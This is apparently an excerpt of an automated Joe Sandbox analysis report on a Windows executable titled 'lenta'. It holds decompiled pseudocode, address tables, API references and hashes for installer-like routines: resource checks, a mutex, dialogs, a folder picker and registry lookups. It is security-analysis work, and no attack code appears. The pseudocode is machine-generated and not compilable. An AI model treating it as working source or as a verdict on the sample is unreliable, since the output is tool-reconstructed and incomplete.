                              0x010e2e30
                              0x010e2ef8
                              0x010e2f01
                              0x00000000
                              0x010e2f01
                              0x010e2d8a
                              0x010e2d8f
                              0x010e2da1
                              0x00000000
                              0x010e2da3
                              0x010e2dae
                              0x010e2db4
                              0x010e2dbb
                              0x00000000
                              0x010e2dca
                              0x010e2dd3
                              0x010e2df5
                              0x010e2e02
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e2dd5
                              0x010e2dde
                              0x010e2de3
                              0x010e2e04
                              0x010e2e0a
                              0x010e2e10
                              0x00000000
                              0x010e2e10
                              0x010e2dd3
                              0x010e2dbb
                              0x010e2da1
                              0x010e2d5b
                              0x010e2d5b
                              0x010e2d5d
                              0x010e2d69
                              0x010e2d6e
                              0x010e2f06
                              0x010e2f06
                              0x010e2f06
                              0x010e2d59
                              0x010e2f18

                              APIs
                              • memset.MSVCRT ref: 010E2CD9
                              • memset.MSVCRT ref: 010E2CE9
                              • memset.MSVCRT ref: 010E2CF9
                                • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46A0
                                • Part of subcall function 010E468F: SizeofResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46A9
                                • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46C3
                                • Part of subcall function 010E468F: LoadResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46CC
                                • Part of subcall function 010E468F: LockResource.KERNEL32(00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46D3
                                • Part of subcall function 010E468F: memcpy_s.MSVCRT ref: 010E46E5
                                • Part of subcall function 010E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46EF
                              • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E2D34
                              • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 010E2D40
                              • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 010E2DAE
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 010E2DBD
                              • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 010E2E0A
                                • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                              • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                              • API String ID: 1002816675-2993962200
                              • Opcode ID: f6904a70dfa99ee7dd9c7edf99ff9a0223097247fde51a6f186ecf565e7c7c03
                              • Instruction ID: 01148ec295ee094816655b86a1042b53477751706ba9d9cd9aa7aab56bc868e4
                              • Opcode Fuzzy Hash: f6904a70dfa99ee7dd9c7edf99ff9a0223097247fde51a6f186ecf565e7c7c03
                              • Instruction Fuzzy Hash: 7451D7703403119EF774AA279D4DB7A3ADCEB95B04F04806DE6C1DA2C9DAB9C8418751
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 81%
                              			E010E34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                              				void* _t9;
                              				void* _t12;
                              				void* _t13;
                              				void* _t17;
                              				void* _t23;
                              				void* _t25;
                              				struct HWND__* _t35;
                              				struct HWND__* _t38;
                              				void* _t39;
                              
                              				_t9 = _a8 - 0x10;
                              				if(_t9 == 0) {
                              					__eflags = 1;
                              					L19:
                              					_push(0);
                              					 *0x10e91d8 = 1;
                              					L20:
                              					_push(_a4);
                              					L21:
                              					EndDialog();
                              					L22:
                              					return 1;
                              				}
                              				_push(1);
                              				_pop(1);
                              				_t12 = _t9 - 0xf2;
                              				if(_t12 == 0) {
                              					__eflags = _a12 - 0x1b;
                              					if(_a12 != 0x1b) {
                              						goto L22;
                              					}
                              					goto L19;
                              				}
                              				_t13 = _t12 - 0xe;
                              				if(_t13 == 0) {
                              					_t35 = _a4;
                              					 *0x10e8584 = _t35;
                              					E010E43D0(_t35, GetDesktopWindow());
                              					__eflags =  *0x10e8184; // 0x1
                              					if(__eflags != 0) {
                              						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                              						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                              					}
                              					SetWindowTextA(_t35, "lenta");
                              					_t17 = CreateThread(0, 0, E010E4FE0, 0, 0, 0x10e8798);
                              					 *0x10e879c = _t17;
                              					__eflags = _t17;
                              					if(_t17 != 0) {
                              						goto L22;
                              					} else {
                              						E010E44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                              						_push(0);
                              						_push(_t35);
                              						goto L21;
                              					}
                              				}
                              				_t23 = _t13 - 1;
                              				if(_t23 == 0) {
                              					__eflags = _a12 - 2;
                              					if(_a12 != 2) {
                              						goto L22;
                              					}
                              					ResetEvent( *0x10e858c);
                              					_t38 =  *0x10e8584; // 0x0
                              					_t25 = E010E44B9(_t38, 0x4b2, 0x10e1140, 0, 0x20, 4);
                              					__eflags = _t25 - 6;
                              					if(_t25 == 6) {
                              						L11:
                              						 *0x10e91d8 = 1;
                              						SetEvent( *0x10e858c);
                              						_t39 =  *0x10e879c; // 0x0
                              						E010E3680(_t39);
                              						_push(0);
                              						goto L20;
                              					}
                              					__eflags = _t25 - 1;
                              					if(_t25 == 1) {
                              						goto L11;
                              					}
                              					SetEvent( *0x10e858c);
                              					goto L22;
                              				}
                              				if(_t23 == 0xe90) {
                              					TerminateThread( *0x10e879c, 0);
                              					EndDialog(_a4, _a12);
                              					return 1;
                              				}
                              				return 0;
                              			}












                              0x010e34fb
                              0x010e34fe
                              0x010e3665
                              0x010e3666
                              0x010e3666
                              0x010e3668
                              0x010e366e
                              0x010e366e
                              0x010e3671
                              0x010e3671
                              0x010e3677
                              0x00000000
                              0x010e3677
                              0x010e3504
                              0x010e3506
                              0x010e3507
                              0x010e350c
                              0x010e365b
                              0x010e365f
                              0x00000000
                              0x00000000
                              0x00000000
                              0x010e3661
                              0x010e3512
                              0x010e3515
                              0x010e35be
                              0x010e35c1
                              0x010e35d1
                              0x010e35d8
                              0x010e35de
                              0x010e35f8
                              0x010e3617
                              0x010e3617
                              0x010e3623
                              0x010e3637
                              0x010e363d
                              0x010e3642
                              0x010e3644
                              0x00000000
                              0x010e3646
                              0x010e3652
                              0x010e3657
                              0x010e3658
                              0x00000000
                              0x010e3658
                              0x010e3644
                              0x010e351b
                              0x010e351d
                              0x010e354f
                              0x010e3553
                              0x00000000
                              0x00000000
                              0x010e355f
                              0x010e3565
                              0x010e357c
                              0x010e3581
                              0x010e3584
                              0x010e359b
                              0x010e35a1
                              0x010e35a7
                              0x010e35ad
                              0x010e35b3
                              0x010e35b8
                              0x00000000
                              0x010e35b8
                              0x010e3586
                              0x010e3588
                              0x00000000
                              0x00000000
                              0x010e3590
                              0x00000000
                              0x010e3590
                              0x010e3524
                              0x010e3535
                              0x010e3541
                              0x00000000
                              0x010e3549
                              0x00000000

                              APIs
                              • TerminateThread.KERNEL32(00000000), ref: 010E3535
                              • EndDialog.USER32(?,?), ref: 010E3541
                              • ResetEvent.KERNEL32 ref: 010E355F
                              • SetEvent.KERNEL32(010E1140,00000000,00000020,00000004), ref: 010E3590
                              • GetDesktopWindow.USER32 ref: 010E35C7
                              • GetDlgItem.USER32(?,0000083B), ref: 010E35F1
                              • SendMessageA.USER32(00000000), ref: 010E35F8
                              • GetDlgItem.USER32(?,0000083B), ref: 010E3610
                              • SendMessageA.USER32(00000000), ref: 010E3617
                              • SetWindowTextA.USER32(?,lenta), ref: 010E3623
                              • CreateThread.KERNEL32 ref: 010E3637
                              • EndDialog.USER32(?,00000000), ref: 010E3671
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                              • String ID: lenta
                              • API String ID: 2406144884-2780258678
                              • Opcode ID: 26b12be7d6d6d3ed9bc90a98439116592647ca92a32535a1c2a6a875e194e4d1
                              • Instruction ID: 1b70ce64f3507b84bd6f05b036b60da2e33cd2aff80eb21ccddd88e7c98fb504
                              • Opcode Fuzzy Hash: 26b12be7d6d6d3ed9bc90a98439116592647ca92a32535a1c2a6a875e194e4d1
                              • Instruction Fuzzy Hash: 91314C71240201AFD7701A3BAC4DE6A3EE9F789F51F14856AF6D29F298CA7A8400CB54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 50%
                              			E010E4224(char __ecx) {
                              				char* _v8;
                              				_Unknown_base(*)()* _v12;
                              				_Unknown_base(*)()* _v16;
                              				_Unknown_base(*)()* _v20;
                              				char* _v28;
                              				intOrPtr _v32;
                              				intOrPtr _v36;
                              				intOrPtr _v40;
                              				char _v44;
                              				char _v48;
                              				char _v52;
                              				_Unknown_base(*)()* _t26;
                              				_Unknown_base(*)()* _t28;
                              				_Unknown_base(*)()* _t29;
                              				_Unknown_base(*)()* _t32;
                              				char _t42;
                              				char* _t44;
                              				char* _t61;
                              				void* _t63;
                              				char* _t65;
                              				struct HINSTANCE__* _t66;
                              				char _t67;
                              				void* _t71;
                              				char _t76;
                              				intOrPtr _t85;
                              
                              				_t67 = __ecx;
                              				_t66 = LoadLibraryA("SHELL32.DLL");
                              				if(_t66 == 0) {
                              					_t63 = 0x4c2;
                              					L22:
                              					E010E44B9(_t67, _t63, 0, 0, 0x10, 0);
                              					return 0;
                              				}
                              				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                              				_v12 = _t26;
                              				if(_t26 == 0) {
                              					L20:
                              					FreeLibrary(_t66);
                              					_t63 = 0x4c1;
                              					goto L22;
                              				}
                              				_t28 = GetProcAddress(_t66, 0xc3);
                              				_v20 = _t28;
                              				if(_t28 == 0) {
                              					goto L20;
                              				}
                              				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                              				_v16 = _t29;
                              				if(_t29 == 0) {
                              					goto L20;
                              				}
                              				_t76 =  *0x10e88c0; // 0x0
                              				if(_t76 != 0) {
                              					L10:
                              					 *0x10e87a0 = 0;
                              					_v52 = _t67;
                              					_v48 = 0;
                              					_v44 = 0;
                              					_v40 = 0x10e8598;
                              					_v36 = 1;
                              					_v32 = E010E4200;
                              					_v28 = 0x10e88c0;
                              					 *0x10ea288( &_v52);
                              					_t32 =  *_v12();
                              					if(_t71 != _t71) {
                              						asm("int 0x29");
                              					}
                              					_v12 = _t32;
                              					if(_t32 != 0) {
                              						 *0x10ea288(_t32, 0x10e88c0);
                              						 *_v16();
                              						if(_t71 != _t71) {
                              							asm("int 0x29");
                              						}
                              						if( *0x10e88c0 != 0) {
                              							E010E1680(0x10e87a0, 0x104, 0x10e88c0);
                              						}
                              						 *0x10ea288(_v12);
                              						 *_v20();
                              						if(_t71 != _t71) {
                              							asm("int 0x29");
                              						}
                              					}
                              					FreeLibrary(_t66);
                              					_t85 =  *0x10e87a0; // 0x0
                              					return 0 | _t85 != 0x00000000;
                              				} else {
                              					GetTempPathA(0x104, 0x10e88c0);
                              					_t61 = 0x10e88c0;
                              					_t4 =  &(_t61[1]); // 0x10e88c1
                              					_t65 = _t4;
                              					do {
                              						_t42 =  *_t61;
                              						_t61 =  &(_t61[1]);
                              					} while (_t42 != 0);
                              					_t5 = _t61 - _t65 + 0x10e88c0; // 0x21d1181
                              					_t44 = CharPrevA(0x10e88c0, _t5);
                              					_v8 = _t44;
                              					if( *_t44 == 0x5c &&  *(CharPrevA(0x10e88c0, _t44)) != 0x3a) {
                              						 *_v8 = 0;
                              					}
                              					goto L10;
                              				}
                              			}




























                              0x010e4234
                              0x010e423c
                              0x010e4240
                              0x010e43b2
                              0x010e43b7
                              0x010e43c0
                              0x00000000
                              0x010e43c5
                              0x010e424c
                              0x010e4252
                              0x010e4257
                              0x010e43a4
                              0x010e43a5
                              0x010e43ab
                              0x00000000
                              0x010e43ab
                              0x010e4263
                              0x010e4269
                              0x010e426e
                              0x00000000
                              0x00000000
                              0x010e427a
                              0x010e4280
                              0x010e4285
                              0x00000000
                              0x00000000
                              0x010e428d
                              0x010e4293
                              0x010e42e6
                              0x010e42e9
                              0x010e42ef
                              0x010e42f4
                              0x010e42f7
                              0x010e4300
                              0x010e4307
                              0x010e430e
                              0x010e4315
                              0x010e431c
                              0x010e4322
                              0x010e4326
                              0x010e432d
                              0x010e432d
                              0x010e432f
                              0x010e4334
                              0x010e4343
                              0x010e4349
                              0x010e434d
                              0x010e4354
                              0x010e4354
                              0x010e435d
                              0x010e436e
                              0x010e436e
                              0x010e437d
                              0x010e4383
                              0x010e4387
                              0x010e438e
                              0x010e438e
                              0x010e4387
                              0x010e4391
                              0x010e4399
                              0x00000000
                              0x010e4295
                              0x010e429f
                              0x010e42a5
                              0x010e42aa
                              0x010e42aa
                              0x010e42ad
                              0x010e42ad
                              0x010e42af
                              0x010e42b0
                              0x010e42b6
                              0x010e42c2
                              0x010e42c8
                              0x010e42ce
                              0x010e42e4
                              0x010e42e4
                              0x00000000
                              0x010e42ce

                              APIs
                              • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 010E4236
                              • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 010E424C
                              • GetProcAddress.KERNEL32(00000000,000000C3), ref: 010E4263
                              • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 010E427A
                              • GetTempPathA.KERNEL32(00000104,010E88C0,?,00000001), ref: 010E429F
                              • CharPrevA.USER32(010E88C0,021D1181,?,00000001), ref: 010E42C2
                              • CharPrevA.USER32(010E88C0,00000000,?,00000001), ref: 010E42D6
                              • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 010E4391
                              • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 010E43A5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                              • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                              • API String ID: 1865808269-1731843650
                              • Opcode ID: ad80f56a3e8faefc51554de6a02f56c98bf753cb3afefae5156463bd93df60b5
                              • Instruction ID: 1e8417f2b3ce7bb1c750db8e4e6ed7a0506f1304daf51aa05c7828971f8009f2
                              • Opcode Fuzzy Hash: ad80f56a3e8faefc51554de6a02f56c98bf753cb3afefae5156463bd93df60b5
                              • Instruction Fuzzy Hash: 3941B574A00204AFE7619F7BE88C96EBFF4EB49744F04819EEAC1EB245C77988018761
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E010E44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                              				signed int _v8;
                              				char _v64;
                              				char _v576;
                              				void* _v580;
                              				struct HWND__* _v584;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t34;
                              				void* _t37;
                              				signed int _t39;
                              				intOrPtr _t43;
                              				signed int _t44;
                              				signed int _t49;
                              				signed int _t52;
                              				void* _t54;
                              				intOrPtr _t55;
                              				intOrPtr _t58;
                              				intOrPtr _t59;
                              				int _t64;
                              				void* _t66;
                              				intOrPtr* _t67;
                              				signed int _t69;
                              				intOrPtr* _t73;
                              				intOrPtr* _t76;
                              				intOrPtr* _t77;
                              				void* _t80;
                              				void* _t81;
                              				void* _t82;
                              				intOrPtr* _t84;
                              				void* _t85;
                              				signed int _t89;
                              
                              				_t75 = __edx;
                              				_t34 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t34 ^ _t89;
                              				_v584 = __ecx;
                              				_t83 = "LoadString() Error.  Could not load string resource.";
                              				_t67 = _a4;
                              				_t69 = 0xd;
                              				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                              				_t80 = _t83 + _t69 + _t69;
                              				_v580 = _t37;
                              				asm("movsb");
                              				if(( *0x10e8a38 & 0x00000001) != 0) {
                              					_t39 = 1;
                              				} else {
                              					_v576 = 0;
                              					LoadStringA( *0x10e9a3c, _t75,  &_v576, 0x200);
                              					if(_v576 != 0) {
                              						_t73 =  &_v576;
                              						_t16 = _t73 + 1; // 0x1
                              						_t75 = _t16;
                              						do {
                              							_t43 =  *_t73;
                              							_t73 = _t73 + 1;
                              						} while (_t43 != 0);
                              						_t84 = _v580;
                              						_t74 = _t73 - _t75;
                              						if(_t84 == 0) {
                              							if(_t67 == 0) {
                              								_t27 = _t74 + 1; // 0x2
                              								_t83 = _t27;
                              								_t44 = LocalAlloc(0x40, _t83);
                              								_t80 = _t44;
                              								if(_t80 == 0) {
                              									goto L6;
                              								} else {
                              									_t75 = _t83;
                              									_t74 = _t80;
                              									E010E1680(_t80, _t83,  &_v576);
                              									goto L23;
                              								}
                              							} else {
                              								_t76 = _t67;
                              								_t24 = _t76 + 1; // 0x1
                              								_t85 = _t24;
                              								do {
                              									_t55 =  *_t76;
                              									_t76 = _t76 + 1;
                              								} while (_t55 != 0);
                              								_t25 = _t76 - _t85 + 0x64; // 0x65
                              								_t83 = _t25 + _t74;
                              								_t44 = LocalAlloc(0x40, _t25 + _t74);
                              								_t80 = _t44;
                              								if(_t80 == 0) {
                              									goto L6;
                              								} else {
                              									E010E171E(_t80, _t83,  &_v576, _t67);
                              									goto L23;
                              								}
                              							}
                              						} else {
                              							_t77 = _t67;
                              							_t18 = _t77 + 1; // 0x1
                              							_t81 = _t18;
                              							do {
                              								_t58 =  *_t77;
                              								_t77 = _t77 + 1;
                              							} while (_t58 != 0);
                              							_t75 = _t77 - _t81;
                              							_t82 = _t84 + 1;
                              							do {
                              								_t59 =  *_t84;
                              								_t84 = _t84 + 1;
                              							} while (_t59 != 0);
                              							_t21 = _t74 + 0x64; // 0x65
                              							_t83 = _t21 + _t84 - _t82 + _t75;
                              							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                              							_t80 = _t44;
                              							if(_t80 == 0) {
                              								goto L6;
                              							} else {
                              								_push(_v580);
                              								E010E171E(_t80, _t83,  &_v576, _t67);
                              								L23:
                              								MessageBeep(_a12);
                              								if(E010E681F(_t67) == 0) {
                              									L25:
                              									_t49 = 0x10000;
                              								} else {
                              									_t54 = E010E67C9(_t74, _t74);
                              									_t49 = 0x190000;
                              									if(_t54 == 0) {
                              										goto L25;
                              									}
                              								}
                              								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16);
                              								_t83 = _t52;
                              								LocalFree(_t80);
                              								_t39 = _t52;
                              							}
                              						}
                              					} else {
                              						if(E010E681F(_t67) == 0) {
                              							L4:
                              							_t64 = 0x10010;
                              						} else {
                              							_t66 = E010E67C9(0, 0);
                              							_t64 = 0x190010;
                              							if(_t66 == 0) {
                              								goto L4;
                              							}
                              						}
                              						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
                              						L6:
                              						_t39 = _t44 | 0xffffffff;
                              					}
                              				}
                              				return E010E6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                              			}



































                              0x010e44b9
                              0x010e44c4
                              0x010e44cb
                              0x010e44d8
                              0x010e44e4
                              0x010e44eb
                              0x010e44ee
                              0x010e44ef
                              0x010e44ef
                              0x010e44f1
                              0x010e44f7
                              0x010e44f8
                              0x010e467b
                              0x010e44fe
                              0x010e4509
                              0x010e4518
                              0x010e4525
                              0x010e4562
                              0x010e4568
                              0x010e4568
                              0x010e456b
                              0x010e456b
                              0x010e456d
                              0x010e456e
                              0x010e4572
                              0x010e4578
                              0x010e457c
                              0x010e45cb
                              0x010e4607
                              0x010e4607
                              0x010e460d
                              0x010e4613
                              0x010e4617
                              0x00000000
                              0x010e461d
                              0x010e4623
                              0x010e4626
                              0x010e4628
                              0x00000000
                              0x010e4628
                              0x010e45cd
                              0x010e45cd
                              0x010e45cf
                              0x010e45cf
                              0x010e45d2
                              0x010e45d2
                              0x010e45d4
                              0x010e45d5
                              0x010e45db
                              0x010e45de
                              0x010e45e3
                              0x010e45e9
                              0x010e45ed
                              0x00000000
                              0x010e45f3
                              0x010e45fd
                              0x00000000
                              0x010e4602
                              0x010e45ed
                              0x010e457e
                              0x010e457e
                              0x010e4580
                              0x010e4580
                              0x010e4583
                              0x010e4583
                              0x010e4585
                              0x010e4586
                              0x010e458a
                              0x010e458c
                              0x010e458f
                              0x010e458f
                              0x010e4591
                              0x010e4592
                              0x010e459b
                              0x010e459e
                              0x010e45a3
                              0x010e45a9
                              0x010e45ad
                              0x00000000
                              0x010e45af
                              0x010e45af
                              0x010e45bf
                              0x010e462d
                              0x010e4630
                              0x010e463d
                              0x010e464e
                              0x010e464e
                              0x010e463f
                              0x010e4640
                              0x010e4647
                              0x010e464c
                              0x00000000
                              0x00000000
                              0x010e464c
                              0x010e4666
                              0x010e466d
                              0x010e466f
                              0x010e4675
                              0x010e4675
                              0x010e45ad
                              0x010e4527
                              0x010e452e
                              0x010e453f
                              0x010e453f
                              0x010e4530
                              0x010e4531
                              0x010e4538
                              0x010e453d
                              0x00000000
                              0x00000000
                              0x010e453d
                              0x010e4554
                              0x010e455a
                              0x010e455a
                              0x010e455a
                              0x010e4525
                              0x010e468c

                              APIs
                              • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                              • MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                              • LocalAlloc.KERNEL32(00000040,00000065), ref: 010E45A3
                              • LocalAlloc.KERNEL32(00000040,00000065), ref: 010E45E3
                              • LocalAlloc.KERNEL32(00000040,00000002), ref: 010E460D
                              • MessageBeep.USER32(00000000), ref: 010E4630
                              • MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 010E4666
                              • LocalFree.KERNEL32(00000000), ref: 010E466F
                                • Part of subcall function 010E681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 010E686E
                                • Part of subcall function 010E681F: GetSystemMetrics.USER32(0000004A), ref: 010E68A7
                                • Part of subcall function 010E681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010E68CC
                                • Part of subcall function 010E681F: RegQueryValueExA.ADVAPI32(?,010E1140,00000000,?,?,0000000C), ref: 010E68F4
                                • Part of subcall function 010E681F: RegCloseKey.ADVAPI32(?), ref: 010E6902
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                              • String ID: LoadString() Error. Could not load string resource.$lenta
                              • API String ID: 3244514340-1000497449
                              • Opcode ID: 2362a7b513661d46fbd15a98280cb5464b531f3bcd50bd5d1030893e623988fd
                              • Instruction ID: cb78bf52fc3f647615a0a77254566dad28d9f9eb6bceb1ac941b5de51c49496a
                              • Opcode Fuzzy Hash: 2362a7b513661d46fbd15a98280cb5464b531f3bcd50bd5d1030893e623988fd
                              • Instruction Fuzzy Hash: 0B510472A00215AFDB219E2ADC4CBAA7BE8EF49700F0441D9EDC9E7205DB36DD05CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E010E2773(CHAR* __ecx, char* _a4) {
                              				signed int _v8;
                              				char _v268;
                              				char _v269;
                              				CHAR* _v276;
                              				int _v280;
                              				void* _v284;
                              				int _v288;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t23;
                              				intOrPtr _t34;
                              				int _t45;
                              				int* _t50;
                              				CHAR* _t52;
                              				CHAR* _t61;
                              				char* _t62;
                              				int _t63;
                              				CHAR* _t64;
                              				signed int _t65;
                              
                              				_t52 = __ecx;
                              				_t23 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t23 ^ _t65;
                              				_t62 = _a4;
                              				_t50 = 0;
                              				_t61 = __ecx;
                              				_v276 = _t62;
                              				 *((char*)(__ecx)) = 0;
                              				if( *_t62 != 0x23) {
                              					_t63 = 0x104;
                              					goto L14;
                              				} else {
                              					_t64 = _t62 + 1;
                              					_v269 = CharUpperA( *_t64);
                              					_v276 = CharNextA(CharNextA(_t64));
                              					_t63 = 0x104;
                              					_t34 = _v269;
                              					if(_t34 == 0x53) {
                              						L14:
                              						GetSystemDirectoryA(_t61, _t63);
                              						goto L15;
                              					} else {
                              						if(_t34 == 0x57) {
                              							GetWindowsDirectoryA(_t61, 0x104);
                              							goto L16;
                              						} else {
                              							_push(_t52);
                              							_v288 = 0x104;
                              							E010E1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                              							_t59 = 0x104;
                              							E010E658A( &_v268, 0x104, _v276);
                              							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                              								L16:
                              								_t59 = _t63;
                              								E010E658A(_t61, _t63, _v276);
                              							} else {
                              								if(RegQueryValueExA(_v284, 0x10e1140, 0,  &_v280, _t61,  &_v288) == 0) {
                              									_t45 = _v280;
                              									if(_t45 != 2) {
                              										L9:
                              										if(_t45 == 1) {
                              											goto L10;
                              										}
                              									} else {
                              										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                              											_t45 = _v280;
                              											goto L9;
                              										} else {
                              											_t59 = 0x104;
                              											E010E1680(_t61, 0x104,  &_v268);
                              											L10:
                              											_t50 = 1;
                              										}
                              									}
                              								}
                              								RegCloseKey(_v284);
                              								L15:
                              								if(_t50 == 0) {
                              									goto L16;
                              								}
                              							}
                              						}
                              					}
                              				}
                              				return E010E6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                              			}























                              0x010e2773
                              0x010e277e
                              0x010e2785
                              0x010e278a
                              0x010e278d
                              0x010e2790
                              0x010e2792
                              0x010e2798
                              0x010e279d
                              0x010e28b2
                              0x00000000
                              0x010e27a3
                              0x010e27a3
                              0x010e27af
                              0x010e27c2
                              0x010e27c8
                              0x010e27cd
                              0x010e27d5
                              0x010e28b7
                              0x010e28b9
                              0x00000000
                              0x010e27db
                              0x010e27dd
                              0x010e28aa
                              0x00000000
                              0x010e27e3
                              0x010e27e3
                              0x010e27ec
                              0x010e27f8
                              0x010e2803
                              0x010e280b
                              0x010e2831
                              0x010e28c3
                              0x010e28c9
                              0x010e28cd
                              0x010e2837
                              0x010e285a
                              0x010e285c
                              0x010e2865
                              0x010e2892
                              0x010e2895
                              0x00000000
                              0x00000000
                              0x010e2867
                              0x010e2878
                              0x010e288c
                              0x00000000
                              0x010e287a
                              0x010e2880
                              0x010e2885
                              0x010e2897
                              0x010e2899
                              0x010e2899
                              0x010e2878
                              0x010e2865
                              0x010e28a0
                              0x010e28bf
                              0x010e28c1
                              0x00000000
                              0x00000000
                              0x010e28c1
                              0x010e2831
                              0x010e27dd
                              0x010e27d5
                              0x010e28e5

                              APIs
